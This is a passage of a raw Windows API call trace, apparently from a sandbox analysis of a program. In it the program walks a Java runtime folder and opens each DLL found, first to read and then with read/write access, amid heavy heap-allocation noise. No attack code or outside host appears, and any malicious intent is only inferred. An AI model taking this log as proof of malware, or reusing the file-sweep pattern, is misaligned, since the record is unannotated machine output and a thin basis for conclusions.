[0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.245] AreFileApisANSI () returned 1 [0091.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0091.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 57 [0091.246] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.246] GetFileType (hFile=0x360) returned 0x1 [0091.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.246] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.246] CloseHandle (hObject=0x360) returned 1 [0091.247] AreFileApisANSI () returned 1 [0091.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0091.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 57 [0091.247] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.247] GetFileType (hFile=0x360) returned 0x1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0091.247] CloseHandle (hObject=0x360) returned 1 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0091.248] AreFileApisANSI () returned 1 [0091.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0091.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0091.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 57 [0091.248] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440)) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0091.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jawt.dll", cAlternateFileName="")) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0091.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.249] AreFileApisANSI () returned 1 [0091.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll", lpUsedDefaultChar=0x0) returned 48 [0091.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.250] AreFileApisANSI () returned 1 [0091.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0091.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 48 [0091.250] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.251] GetFileType (hFile=0x360) returned 0x1 [0091.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0091.251] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.251] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.251] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.252] CloseHandle (hObject=0x360) returned 1 [0091.252] AreFileApisANSI () returned 1 [0091.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0091.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 48 [0091.252] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.252] GetFileType (hFile=0x360) returned 0x1 [0091.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0091.252] CloseHandle (hObject=0x360) returned 1 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.272] AreFileApisANSI () returned 1 [0091.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0091.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 48 [0091.272] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3840)) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0091.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.273] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="JAWTAccessBridge-64.dll", cAlternateFileName="JAWTAC~1.DLL")) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0091.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0091.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0091.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 